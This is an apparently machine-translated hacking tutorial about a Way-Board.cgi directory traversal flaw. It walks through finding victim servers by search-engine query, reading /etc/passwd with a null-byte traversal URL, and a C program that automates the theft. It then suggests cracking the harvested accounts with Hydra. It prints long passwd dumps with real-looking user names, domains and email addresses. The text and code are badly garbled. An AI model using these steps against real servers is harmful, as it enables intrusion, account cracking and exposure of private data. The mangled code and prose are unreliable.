Linux C programming four Way-Board.cgi vulnerability scanner

Linux C programming four Way-Board.cgi vulnerability scanner

One idea: playing Way-Board.cgi the day before yesterday, very good. The description of this vulnerability: Way-board.cgi leak system file vulnerability, using it can easily get the host's Passwd and other files with appropriate permissions. Specific manual use 1: Search for www.google.com, Search Keyword "WAY -Board.cgi will get a lot of URLs such as:

Targetip / Way-Board / Way-Board.cgi? db = market

Open another browser, add the modified URL: http://targetip/way-board/way-board.cgi? Db = .. / .. / .. / .. / .. / .. /. / etc / passwd% 00

You can see the PASSWD of the target host. The result is as follows: root: x: 0: 0: root: / root: / bin / bash bin: x: 1: 1: bin: / bin: daem: x: 2: 2: Daemon: / sbin: adm: x: 3: 4: ADM: / VAR / ADM: LP: x: 4: 7: lp: / var / spool / lpd: sync: x: 5: 0: Sync: / sbin: / bin / sync shutdown: x: 6: 0: Shutdown: / sbin: / sbin / shutdown halt: x: 7: 0: Halt: / sbin: / sbin / halt mail: x: 8: 12: mail: / var / spool / mail: news: x: 9: 13: News: / var / spool / news: uucp: x: 10: 14: uucp: / var / spool / uucp: operator: x: 11: 0: Operator: / ROOT: GAMES: X: 12: 100: Games: / usr / games: gopher: x: 13: 30: Gopher: / usr / lib / gopher-data: ftp: x: 14: 50: ftp user: / www / FTP: anonymous: x: 15: 50: FTP User: / www / ftp: Nobody: x: 99: 99: NoBody: /: mishka: x: 499: 100: Skyport DNS Service: / Home / Mishka: / bin / Bash Nak: x: 500: 100 :: / Home / Nak: / bin / bash RBO: X: ​​501: 100 :: / HOME / RBO: / BIN / BASH Chiliasp: x: 504: 100: Chili! ASP Database User : / Home / Chiliasp: / dev / null listserv: x: 505: 100 :: / Home / listServ: / bin / bash steve: x: 506: 506 :: / home / steve: / bin / bash ... ....... HKSChule: x: 990: 200: hnschule@eurokorean.com: ./ www / htdocs / eUROKOREAN / HKSCHULE: / ETC / ftponly Sweden: x: 991: 200: Sweden@eurokorean.com: ./www/htdo CS / EUROKOREAN / SWEDEN: / ETC / FTPONLY Heidelberg: x: 992: 200: Heidelberg@eurokorean.com: ./ www / htdocs / eUROKOREAN / HEIDELBERG: / ETC / FTPONLYFINKOREA: X: 993: 200: Finkore@eurokorean.com : ./ www / htdocs / eurokorean / finkorea: / etc / ftponly Washing (Trade)

矫 矫 魄 沥 啊 啊 犁 犁 犁 沥 沥. 矫 矫 (((.

Root: x: 0: 0: root: / root: / bin / bash bin: x: 1: 1: bin: / bin: daem: x: 2: 2: daem: / sbin: adm: x: 3: 4 : adm: / var / adm: lp: x: 4: 7: lp: / var / spool / lpd: sync: x: 5: 0: sync: / sbin: / bin / sync shutdown: x: 6: 0: SHUTDOWN: / SBIN: / SBIN / SHUTDOWN HALT: X: 7: 0: Halt: / Sbin: / Sbin / Halt Mail: x: 8: 12: Mail: / Var / Spool / Mail: News: x: 9: 13 : News: / var / spool / news: uucp: x: 10: 14: uucp: / var / spool / uucp: Operator: x: 11: 0: Operator: / root: Games: x: 12: 100: Games: / usr / games: gopher: x: 13: 30: Gopher: / usr / lib / gopher-data: ftp: x: 14: 50: ftp user: / www / ftp: anonymous: x: 15: 50: FTP User : / www / ftp: nobody: x: 99: 99: NOBODY: /: MISHKA: X: 499: 100: Skyport DNS Service: / Home / Mishka: / bin / Bash Nak: x: 500: 100 :: / HOME / NAK: / BIN / BASH RBO: X: ​​501: 100 :: / HOME / RBO: / BIN / BASH Chiliasp: x: 504: 100: Chili! ASP Database User: / Home / Chiliasp: / dev / null listserv: x: 505: 100 :: / Home / ListServ: / Bash Steve: x: 506: 506 :: / Home / Steve: / Bash Bash Bdsmark: x: 509: 501: bdsmark@bdsmark.com: / home / bsmark: / bin / bash bd-dollz: x: 510: 502: bd-dollz@bd-dollz.com: / home / bd-dollz: / bin / Bash Suchislifeusa: x: 511: 503: Suchislifeusa @ Suchis lifeusa.net:/home/suchislifeusa:/bin/bash memphispoetry: x: 512: 504: memphispoetry@memphispoetry.com: / home / memphispoetry: / bin / bash eagleridgestore: x: 514: 507: eagleridgestore@eagleridgestore.com: / home / eagleridgestore: / bin / bash ......... HKSChule: x: 990: 200: hnschule@eurokorean.com: ./ www / htdocs / eUROKOREAN / HKSCHULE: / ETC / ftponly sweden: X: 991: 200: Sweden@eurokorean.com: ./ www / htdocs / eurokorean / sweden: / etc / ftponly Heidelberg: x: 992: 200: Heidelberg@eurokorean.com: ./ www / htdocs / eurokorean / heidelberg: /etc/ftponlyfinkorea: x:993:200:finkorea@eurokorean.com:/www/htdocs/eurokorean/finkorea:/etc/ftponly copies, and use the decomposition program used to write to decompose users. It is easy to get a normal user of the host by remotely guess Telnet or FTP. Careful will find that the user who has obtained is actually very messy. It is very troublesome to handle!

Specific manual use 2: Under Linux: Telnet Targetip 80 in the input: get /way-board/way-board.cgi?db=../....../../../../../../../../../ .. /... et p 0%% 结果: root: x: 0: 0: root: / root: / bin / bash bin: x: 1: 1: bin: / bin: / SBIN / NOLOGIN DAEMON: X: 2: 2: daem: / sbin: / sbin / nologin adjm: x: 3: 4: ADM: / var / adm: / sbin / nologin lp: x: 4: 7: LP: / Var / spool / lpd: / sbin / nologin sync: x: 5: 0: Sync: / sbin: / bin / sync shutdown: x: 6: 0: shutdown: / sbin: / sbin / shutdown halt: x: 7: 0: Halt: / sbin: / sbin / halt mail: x: 8: 12: mail: / var / spool / mail: / sbin / nologin news: x: 9: 13: news: / var / spool / news: uucp : x: 10: 14: uucp: / var / spool / uucp: / sbin / nologin operator: x: 11: 0: Operator: / root: / sbin / nologin games: x: 12: 100: Games: / usr / Games: / sbin / nologin ftp: x: 14: 50: FTP User: / var / ftp: / sbin / nologin number: x: 99: 99: NoBody: /: / sbin / nologin ntp: x: 38: 38: : / etc / ntp: / sbin / nologin ....... USR1120: x: 1144: 1145: www.freeware995.com: / home / cofst1 / usr1120: / bin / bash derekw: x: 1069: 1069: Www.wavy10.com:/Home/cust1/usr1071/html/derekwing :/bin/bash usr1121: x: 1145: 1146: www.ladyalejandra.com: / home / cust1 / usr1121: / bin / bash waterlogging (trade The government

矫 魄 魄 焊 啊 啊 啊 犁 犁 犁. 沥 沥. 沥 沥 矫 矫 矫 矫 矫... R))))) 0: root: / root: / bash bash bin: x: 1: 1: bin: / bin: / sbin / nologin daem: x: 2: 2: daem: / sbin: / sbin / nologin adm: x: 3 : 4: ADM: / VAR / ADM: / SBIN / NOLOGIN LP: x: 4: 7: lp: / var / spool / lpd: / sbin / nologin sync: x: 5: 0: Sync: / sbin: / bin / sync shutdown: x: 6: 0: shutdown: / sbin: / sbin / shutdown Halt: x: 7: 0: Halt: / sbin: / sbin / halt ......... PCAP: x: 77 : 77 :: / VAR / ARPWATCH: / SBIN / NOLOGIN VCSA: X: 69: 69: Virtual Console Memory Owner: / dev: / sbin / nologin shoparound: x: 1069: 1069: www.wavy10.com: / home / Cust1 / usr1071 / html / shoparound: / bash usr1119: x: 1143: 1144: www.opuscaffe.com: / home / Cust1 / usr1119: / bash giordano: x: 1143: 1144: www.opuscaffe.com : / Home / Cust1 / USR1119: / BIN / BASH USR1120: X: 1144: 1145: www.freeware995.com: / home / Cust1 / USR1120: / bin / bash results better than the result of the browser Copy out, you can use my decomposition program to separate users, but there is a problem that users will repeat and useless users. You will find it as long as you watch the characteristics of the user document. The user document has two times, and the user who gets it will be repeated. However, this has no effect on the guess password, so I have programmed it or not check the user's repetition, just remove those impossible users.

II. Function Description: This also uses Socket programming knowledge. In my third article, there is a brief introduction. Now review it: 1. Socket Type Socket_StreamSocket_Dgramsocket_RAWSOCKET_SEQPACKETSOCKET_RDM

2. Slim address structure SockAddr_insockAddrin_ADDR

3. The implementation process of TCP socket:

Service-Terminal

Socket () | bind () | client listen () socket () | | accept () <- Coordinate connection ---- connection () | | rv () <--- Data Request -------- Send () <- ---- Data Response ----> Recv () - | | RECV () <---- end connection ------ Close () | Close ()

The following specifically introduces several important functions:

1. Socket (): 1.1 prototype: #include #incldue int design (int domain); 1.2 function description: call the socket function to get a file Descriptor Domain: Protocol clusters and address clusters, the most commonly used AF_INET (IPv4 protocol) and AF_INET6 (IPv6 protocol)

TYPE: Communication Type SOCK_STREAM (byte Jacket Interface), SOCK_DGRAM (Data Supply Set) and SOCK_RAW (Original Set Interface) Protocol: The protocol used is 0, and the system is automatically selected. 1.3 Return value: successfully returned non-zero, failed to return -1.

2.Connect (): 2.1 Prototype: #include #include int connection (int name, int namelen); 2.2 Description: Call connection CONNECT Syndrographic indicating the address of the remote end S is the socket () function returned by the socket descriptor name is a pointer containing the remote host IP address and port number is the length of the remote address structure 2.3 Return value to return 0, failed to return -1

3.send (): 3.1 prototype: #include #include int send (int SEND (int S, const void * msg, size_t len, int flags); 3.2 Description: s is Accept () returned to the socket descriptor for the client is a socket descriptor returned. The MSG is a data buffer to a transmission information. LEN indicates that the size of the transmitted data buffer is the transfer control flag, which is defined as follows: 0 MSG_DONTROUT Send data by the most direct path, and ignores the routing settings of the underlying protocol. If Flags is 0, then READ Write the same operation 3.3 Return value successfully returns the length of the transmitted data, with bytes, failed to return -1.

4.Recv (): 4.1 Prototy: #include #include int RECV (int S, void * buf, size_t len, int flags); 4.2 Description: s is Accept () Returns the socket descriptor, for the customer is a socket descriptor returned. BUF is a data buffer that contains accept information. Len and Flags are the same. 4.3 Return value successfully returns the received data length, failed to return -1.

5.GethostByname (): 5.1 Prototype: String gethostByname (String hostname); 5.2 Description: This function returns an IP URL (IP Address) of a machine name (Domain Name). If the execution fails, return the original machine name.

6. SockAddr_in structure: 6.1 Structure: SockAddr_in defines in Netinet / in.h: struct sockaddr_in {short int sin_family; / * protocol * / unsigned short int sin_port; / * port number * / struct in_addr sin_addr; / * Network address * / unsigned char sin_zero [8]; / * Keep and SOCKADDR Structures * /}; 6.2 Description: Use the SockAddr_in structure to set / obtain address information. SIN_FAMILY refers to the protocol, which can only be AF_INITSIN_PORT storage port number (using network byte order) SIN_ADDR to store IP addresses, using IN_ADDR {UNSIGNED long s_addr;}; this data structure is due to historical reasons The reserved is mainly used as a previous format. S_addr Stores the IP Address SIN_ZERO in the network byte sequence to keep the SockAddr to maintain the same empty byte that remains the same as the SOCKADDR_IN. 6.3 Example: Struct SockAddr_in sa; sa.sin_family = AF_INET; sa.sin_port = HTONS (3490); / * short, nbo * / sa.sin_addr.s_addr = inet_addr ("132.241.5.10"); Bzero (& (SA. SIN_ZERO, 8); Note: If sa.sin_addr.s_addr = INADDR_ANY, the IP address 7.Hostent structure 7.1 structure: This data structure is defined as follows: struct hostent {char * h_name; / * The official name of the host * / Char ** h_aliases; / * Host alias * / int h_addrtype; / * Return the address type, generally AF_INET * / INT H_LENGTH; / * Address byte length * / char ** h_addr_list / * Host network address * /}

These are the foundation of Socket programming, and see more, nor is it!

3. Programming:

Under Linux: Create file Nightcat @ nightcat $ vi wayboard.c Editing the following: / * The Wayboard Canner Version 1.0 * * One Simple Method Generate Linux Chicken Is To Search CGI Script Way-Board.c * Gi and Use My Small Tools To Get the passwd.txt * * * to Complie: * User $ gcc -o wayboard wayboard.c * * to use: * user $. / wayboard somedomain.com Directory (ie ./wayboard antionline.com) * * Coded by nightcat * MARCH 2004 * * /

#include #include #include #include #include #include #include #include #include #include #include int main (int Argc, char * argv []) {

INT S; STRUCT IN_ADDR ADDR; STRUCT SOCKADDR_IN VICTEM; STRUCT HOSTENT * BAD; Char Buffer [1024]; File * fp; char cgihole [300]; if (argc! = 3) {EXIT (Printf ("/ NUSAGE:% s Domain.com Directory ", Argv [0])); / *** Note 1 *** /} Sprintf (cgihole," get% s http / 1.0 / n / n ", argv [2]); Printf (" % s ", cgihole); if ((BAD = gethostByname) == null) {EXIT (Printf (" Error getting hostname / n ");}

Printf ("Check the Hole / N"); Printf ("Coded by Nighcat / N");

System ("Sleep 2");

S = socket (AF_INET, SOCK_STREAM, 0); if (s <0) exit (Printf ("Socket Error / N");

Bcopy (Bad-> h_addr, (char *) & victem.sin_addr, bad-> h_length; victem.sin_family = AF_INET; VICTEM.SIN_PORT = HTONS (80); IF (Connect (S, (S, Struct SockAddr *) & VicTem, Sizeof (VICTEM) <0) {EXIT (Printf ("Connect Error / N"));} Printf ("/ Ngetting Host's Passwd.txt / N / N"); if ((fp = fopen ("getPasswd.txt" , "W")) == null) {EXIT (Printf ("Cann't open file"));} Send (s, cgihole, sizeof (cgihole), 0); while (RECV (S, Buffer, Sizeof) Buffer, 0)> 0) {/ *** Note Two *** / FPRINTF (FP, "% S", Buffer;} fclose (fp); close (s);}

Save Exit: WQ Compilation Perform: $ GCC -O WAYBOARD WAYBOARD.C $. / WAYBOARD TARGETIP /WAY-BOARD/WAY-BOARD.CGI Matb=..../../../../ .. /....../etc/passwd gets and manually utilizes two, the same user documentation.

You can get the normal user of the host with a method of cracking. I like to use Hydra to crack $. / Hydra -f /root/passwd.txt targetip telnet Detailed look at his description! You can also crack other services. FTP / VNC / SMTP, etc.! IV. Note One: Here is the format of the input, in fact, this program can use other ShowFile class vulnerabilities, and I will introduce another ShowFile vulnerability. Note 2: Here to use the While judgment to accept all return data, I also got a good time here, I understand! This means that if the data is more than zero, continue to write to the file until the data is written.

Five contact me:

Nickname: NIGHTCATE-mail: ncnynl@hotmail.comqq: 1043931icq: 153436005